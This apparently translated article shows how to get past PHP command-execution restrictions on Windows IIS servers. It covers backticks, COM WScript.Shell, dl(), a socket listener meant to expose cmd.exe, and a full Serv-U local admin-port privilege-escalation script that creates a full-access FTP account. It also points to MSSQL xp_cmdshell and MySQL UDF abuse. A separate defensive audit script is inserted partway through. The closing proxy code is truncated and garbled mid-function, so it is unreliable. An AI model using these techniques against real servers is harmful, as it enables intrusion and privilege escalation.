From Windows 2000 to Windows XP and then to Windows 2003, the improvement in the security of Microsoft's IIS server is obvious. On Windows 2000 an ordinary PHP shell can defeat it; on Windows XP, even with safe_mode = off, you cannot use functions such as system() to execute system commands, but you can still break through with COM(); on Windows 2003, even when IIS and PHP are installed with default settings, you may be able to use neither system() nor COM() to defeat them. At that point you have to use some new methods to make a breakthrough.
1. Breakthrough of disable_functions
In PHP 4.0.1 and above, a directive named disable_functions is available in php.ini. It is quite useful and can be used to disable certain functions. For example, if you add disable_functions = passthru,exec,system,popen to php.ini, then calling any of these functions prompts "Warning: system() has been disabled for security reasons" and the program terminates. But that does not rule out executing system commands: because PHP borrows many Perl features, you can, for example, also use backticks (`) to execute commands. The sample code is as follows:
<?php
$output = `ls -al`;
echo "<pre>$output</pre>";
?>
It is said that this can only be avoided by setting safe_mode to on, but the last time I used it on a foreign server, it still failed. People are not always so lucky:)
2. Application of the dl() function
When none of PHP's built-in command execution functions nor the backtick operator (`) can be used, you can try dl(). This method only works with safe_mode = off, because dl() is disabled in safe mode. With dl() you can directly call W32api functions. Unfortunately, this extension has been moved to the PECL library and is no longer bundled with PHP as of 5.1.0. The following is an example from the manual:
<?php
// Load this extension
dl("php_w32api.dll");
// Register the GetTickCount function from kernel32.dll
w32api_register_function("kernel32.dll",
                         "GetTickCount",
                         "long");
// Register the MessageBoxA function from User32.dll
w32api_register_function("User32.dll",
                         "MessageBoxA",
                         "long");
// MB_OK is a Win32 constant (0) that PHP itself does not define
define('MB_OK', 0);
// Get boot time information
$ticks = GetTickCount();
// Convert to easy-to-understand text
$secs  = floor($ticks / 1000);
$mins  = floor($secs / 60);
$hours = floor($mins / 60);
$str = sprintf("You have been using your computer for:" .
               "\r\n %d Milliseconds, or \r\n %d Seconds" .
               "or \r\n %d mins or\r\n %d hours %d mins.",
               $ticks,
               $secs,
               $mins,
               $hours,
               $mins - ($hours * 60));
// Display a message dialog box with only an OK button and the boot time text
MessageBoxA(NULL,
            $str,
            "Uptime Information",
            MB_OK);
?>
Unfortunately I do not yet have a thorough understanding of dl() and W32api, so I won't give random examples, to avoid misleading readers.
3. Application of COM and .Net (Windows) functions
COM (Component Object Model) is a software specification developed by Microsoft for building object-oriented, compiled software components. It allows software to be abstracted into binary components and is mainly used on the Windows platform.
The Windows version of PHP has built-in support for this extension; no additional extension library needs to be loaded to use COM functions. Its usage is similar to the syntax for instantiating a class in C++ or Java: the COM class name is passed to the constructor as a parameter. For example, use "WScript.Shell" in PHP to execute system commands:
<?php
$cmd = "E:/cert/admin/psexec.exe";
if ($com = new COM("WScript.Shell")) echo "yes";
// WScript.Shell::Exec returns a WshScriptExec object; its StdOut stream is read in full
if (!$cmd1 = $com->exec($cmd))
{
    echo "can not exec()";
}
if (!$cmd2 = $cmd1->stdout())
{
    echo "can not stdout()";
}
if (!$cmd3 = $cmd2->readall())
{
    echo "can not readall()";
}
echo $cmd3;
?>
Figure 1 is an example I wrote to execute psexec.exe.
The meaning of this code is exactly the same as in ASP. Of course, you can also call "ADODB.Connection" as in ASP; combining this component with the Jet2 overflow vulnerability, you may be able to get a shell under PHP with safe mode = on.
<?php
// create the database connection
$conn = new COM("ADODB.Connection");
$dsn = "DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=" . realpath("mydb.mdb");
$conn->Open($dsn);
// pull the data through an SQL string
$rs = $conn->Execute("select clients from web");
// …
?>
.NET functions run only on PHP 5 and of course require the .NET runtime; this is still an experimental PHP module that is not yet fully functional, so I will not discuss it here.
4. Application of Java() function
This method is suitable for safe mode = on. To use the Java module, the server must have a Java virtual machine installed in advance, and the with-java option must be turned on when PHP is configured and compiled. The php.ini settings are as follows:
[JAVA]
; This is the path to php_java.jar
;java.class.path = .\php_java.jar
; JDK path
;java.home = f:\jdk1.3.0
; Path to the virtual machine
;java.library = f:\jdk1.3.0\jre\bin\hotspot\jvm.dll
As with COM, to create a Java class (not just JavaBeans) simply pass the Java class name as a parameter to the constructor. Here is an example from the manual:
<?php
// This example is only intended to be run as a CGI.
$frame  = new Java('java.awt.Frame', 'PHP');
$button = new Java('java.awt.Button', 'Hello Java World!');
$frame->add('North', $button);
$frame->validate();
$frame->pack();
$frame->visible = True;
$thread = new Java('java.lang.Thread');
$thread->sleep(10000);
$frame->dispose();
?>
Unfortunately, there are not many PHP servers that truly support Java, so there is no need to discuss this further.
5. Application of socket() function
Sockets are an extremely powerful module in PHP. If you use the high-level, abstract interface (sockets opened with fsockopen() and pfsockopen()), you do not need to enable php_sockets.dll. But if you want to use the complete set of socket functions, you must set it like this in php.ini:
; Windows Extensions
; Note that MySQL and ODBC support is now built in, so no dll is needed for it.
; ...
; Remove the semicolon at the front of the following line
;extension=php_sockets.dll
Using PHP's socket functions you can implement port forwarding/redirection, packet sniffing, local overflows and other functionality; they can do most of what nc can do, and can also be used to build a TCP/UDP server. I also think this is the best way to break through a server's security policy. The following is an example of opening a port on the server to build a TCP server; you can use it to bind the server's cmd.exe to that port:
<?php
// Construct a TCP service on the server
// This example requires the support of php_sockets.dll
// After execution you can use "telnet 127.0.0.1 1020" to connect
error_reporting(E_ALL);
/* Allow the script to hang around waiting for connections. */
set_time_limit(0);
/* Turn on implicit output flushing so we see what we're getting
 * as it comes in. */
ob_implicit_flush();
// Bind IP and port on the server
$address = '127.0.0.1';
$port = 1020;
// The socket functions return false on failure, so test with === false
if (($sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) === false) {
    echo "socket_create() failed: reason: " . socket_strerror(socket_last_error()) . "\n";
}
if (socket_bind($sock, $address, $port) === false) {
    echo "socket_bind() failed: reason: " . socket_strerror(socket_last_error($sock)) . "\n";
}
if (socket_listen($sock, 5) === false) {
    echo "socket_listen() failed: reason: " . socket_strerror(socket_last_error($sock)) . "\n";
}
do {
    if (($msgsock = socket_accept($sock)) === false) {
        echo "socket_accept() failed: reason: " . socket_strerror(socket_last_error($sock)) . "\n";
        break;
    }
    /* Send instructions. */
    $msg = "\nWelcome to the PHP Test Server. \n" .
           "To quit, type 'quit'. To shut down the server type 'shutdown'.\n";
    socket_write($msgsock, $msg, strlen($msg));
    do {
        if (false === socket_recv($msgsock, $buf, 1024, 0)) {
            echo "socket_recv() failed: reason: " . socket_strerror(socket_last_error($msgsock)) . "\n";
            break 2;
        }
        if (!$buf = trim($buf)) {
            continue;
        }
        if ($buf == 'quit') {
            break;
        }
        if ($buf == 'shutdown') {
            socket_close($msgsock);
            break 2;
        }
        $talkback = "PHP: You said '$buf'.\n";
        socket_write($msgsock, $talkback, strlen($talkback));
        echo "$buf\n";
        // The following processes the received buf
        /* eg: for example
        $buf = "cmd.exe /c netstat -an";
        $pp = popen('$buf ', 'r');
        while ($read = fgets($pp, 2096))
            echo $read;
        pclose($pp);
        */
    } while (true);
    socket_close($msgsock);
} while (true);
socket_close($sock);
?>
In fact, many hosts do not load php_sockets.dll. Fortunately, the fsockopen() function, which does not require the sockets module, is enough for our purposes, because as long as fsockopen() is available we can freely read and write ports on the local machine that are not open to the outside world. Using fsockopen() to read and write Serv-U's local management port 43958 (note: this port cannot be connected to externally) for privilege escalation is a typical example:
<?php
$adminuser = "LocalAdministrator";
$adminpass = '#l@$ak#.lk;0@P';  // single-quoted so that "$ak" is not interpolated
$adminport = "43958";
// $addr, $ftpport, $user, $password and $homedir are not defined in the original
// listing and must be set by the caller before this point
$fp = fsockopen("127.0.0.1", $adminport, $errno, $errstr, 8);
if (!$fp) {
    echo "$errstr ($errno)\n";
} else {
    // $shellcode can be written here
    // fputs($fp, $shellcode);
    fputs($fp, "USER " . $adminuser . "\r\n");
    sleep(1);
    fputs($fp, "PASS " . $adminpass . "\r\n");
    sleep(1);
    fputs($fp, "SITE MAINTENANCE\r\n");
    sleep(1);
    fputs($fp, "-SETUSERSETUP\r\n");
    fputs($fp, "-IP=" . $addr . "\r\n");
    fputs($fp, "-PortNo=" . $ftpport . "\r\n");
    fputs($fp, "-User=" . $user . "\r\n");
    fputs($fp, "-Password=" . $password . "\r\n");
    fputs($fp, "-HomeDir=" . $homedir . "\r\n");
    fputs($fp, "-LoginMesFile=\r\n");
    fputs($fp, "-Disable=0\r\n");
    fputs($fp, "-RelPaths=0\r\n");
    fputs($fp, "-NeedSecure=0\r\n");
    fputs($fp, "-HideHidden=0\r\n");
    fputs($fp, "-AlwaysAllowLogin=0\r\n");
    fputs($fp, "-ChangePassword=1\r\n");
    fputs($fp, "-QuotaEnable=0\r\n");
    fputs($fp, "-MaxUsersLoginPerIP=-1\r\n");
    fputs($fp, "-SpeedLimitUp=-1\r\n");
    fputs($fp, "-SpeedLimitDown=-1\r\n");
    fputs($fp, "-MaxNrUsers=-1\r\n");
    fputs($fp, "-IdleTimeOut=600\r\n");
    fputs($fp, "-SessionTimeOut=-1\r\n");
    fputs($fp, "-Expire=0\r\n");
    fputs($fp, "-RatioUp=1\r\n");
    fputs($fp, "-RatioDown=1\r\n");
    fputs($fp, "-RatiosCredit=0\r\n");
    fputs($fp, "-QuotaCurrent=0\r\n");
    fputs($fp, "-QuotaMaximum=0\r\n");
    fputs($fp, "-Maintenance=System\r\n");
    fputs($fp, "-PasswordType=Regular\r\n");
    fputs($fp, "-Ratios=None\r\n");
    fputs($fp, "-Access=" . $homedir . "|RWAMELCDP\r\n");
    fputs($fp, "QUIT\r\n");
    sleep(1);
    while (!feof($fp)) {
        echo fgets($fp, 128);
    }
}
?>
You can also use fsockopen() to write an HTTP proxy to reach the external network, or websites on the local machine that are not externally accessible. I have a complete HTTP proxy (Figure 4); the code is long, but interested readers can take a look.
6. The MySQL/MSSQL interface
Unlike on Linux, MySQL/MSSQL under Windows generally runs as a system administrator. Therefore, as long as you can get the root/sa password of the local SQL database, you can connect to it from PHP and use it directly to execute system commands.
Executing system commands in MySQL requires the "MySQL UDF dynamic library" (user-defined function) technique. In MSSQL, once you are connected to the database you can directly call the "master..xp_cmdshell" extended stored procedure to execute commands; the permissions are of course SYSTEM permissions.
To summarize: because versions of the operating system, IIS and PHP differ, the breakthrough methods described above may change. PHP also has many other extension functions that can be used. Step outside the system()-style command execution functions and you may break through the restrictions of the system security policy!
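As an added hardening check (not part of the original article) covering the vectors in sections 1, 2, 3 and 5, the following PHP script reports which of them the current php.ini still leaves reachable. The function, class and directive names are PHP's own; the Serv-U port is the one quoted above.

```php
<?php
// Added audit script, not from the original article. Run it once on the server
// (CLI or web root), act on the findings, then remove it.
function php_exec_vectors_audit() {
    $findings = array();
    // Section 1: disable_functions. The backtick operator is implemented by
    // shell_exec(), so disabling shell_exec() also disables `cmd`.
    $exec_funcs = array('system', 'exec', 'passthru', 'shell_exec',
                        'popen', 'proc_open', 'pcntl_exec');
    $disabled = array_map('trim', explode(',', (string) ini_get('disable_functions')));
    foreach ($exec_funcs as $f) {
        // PHP 8 makes function_exists() false for disabled functions; older
        // versions still list them, hence the second test.
        if (function_exists($f) && !in_array($f, $disabled, true)) {
            $findings[] = "$f() is callable; add it to disable_functions";
        }
    }
    // Section 2: dl() loads arbitrary extensions (e.g. php_w32api.dll) unless
    // enable_dl=Off. Since PHP 5.3 only the CLI, CGI and embed SAPIs allow it anyway.
    if (function_exists('dl') && ini_get('enable_dl')) {
        $findings[] = 'dl() is enabled; set enable_dl=Off';
    }
    // Section 3: the COM class (WScript.Shell, ADODB.Connection) is built in on
    // Windows; it is only blocked by disable_classes=COM.
    if (class_exists('COM', false)) {
        $findings[] = 'COM class is available; add COM to disable_classes';
    }
    // Section 5: the low-level socket API needs php_sockets.dll, fsockopen()
    // does not, so both are reported separately.
    if (extension_loaded('sockets')) {
        $findings[] = 'sockets extension loaded; remove extension=php_sockets.dll if unused';
    }
    if (function_exists('fsockopen') && !in_array('fsockopen', $disabled, true)) {
        $findings[] = 'fsockopen() is callable; local-only admin ports (e.g. Serv-U 43958) are reachable from PHP';
    }
    return $findings;
}

foreach (php_exec_vectors_audit() as $line) {
    echo "[!] $line\n";
}
?>
```

An empty report means every vector the article discusses is closed by configuration; a non-empty one lists the php.ini change that closes each remaining vector.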
Attached is the proxy.php code
<?php
error_reporting(E_ALL);
/*
// This program is free software; you can redistribute it and/or
// modify it under the terms of the GNU General Public License
// as published by the Free Software Foundation; either version 2
// of the License, or (at your option) any later version.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with this program; if not, write to the Free Software
// Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
//-------------------------------------------------------------------------
// Class : PHProxy
// Author: ultimategamer00 (Abdullah A.)
// Last Modified: 6:28 PM 6/22/2004
*/
function __stripslashes($str)
{
return get_magic_quotes_gpc() ? stripslashes($str) : $str;
}
if (!function_exists('str_rot13'))
{
function str_rot13($str)
{
static $alpha = array('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ',
'nopqrstuvwxyzabcdefghijklmNOPQRSTUVWXYZABCDEFGHIJKLM');
return strtr($str, $alpha[0], $alpha[1]);
}
}
class PHProxy
{
var $allowed_hosts = array();
var $version;
var $script_url;
var $url;
var $url_segments;
var $flags = array('include_form' => 1, 'remove_scripts' => 1, 'accept_cookies' => 1, 'show_images' => 1, 'show_referer' => 1);
var $socket;
var $content_type;
var $request_headers;
var $post_body;
var $response_headers;
var $response_body;
function PHProxy($flags = 'previous')
{
$this->version = '0.2';
$this->script_url = 'http'
. (isset(
function set_request_headers()
{
$headers = " " . (isset($this->url_segments['query']) ? "?" : '') . " HTTP/1.0\r\n";
$headers .= "Host: :\r\n";
$headers .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";
$headers .= "Accept: text/xml, application/xml, application/xhtml+xml, text/html;q=0.9, text/plain;q=0.8, video/x-mng, image/png, image/jpeg, image/gif;q=0.2, */*;q=0.1\r\n";
$headers .= "Connection: close\r\n";
if ($this->flags['show_referer'] == 1)
{
$headers .= "Referer: \r\n";
}
$cookies = $this->get_cookies();
$headers .= $cookies != '' ? "Cookie: $cookies\r\n" : '';
if (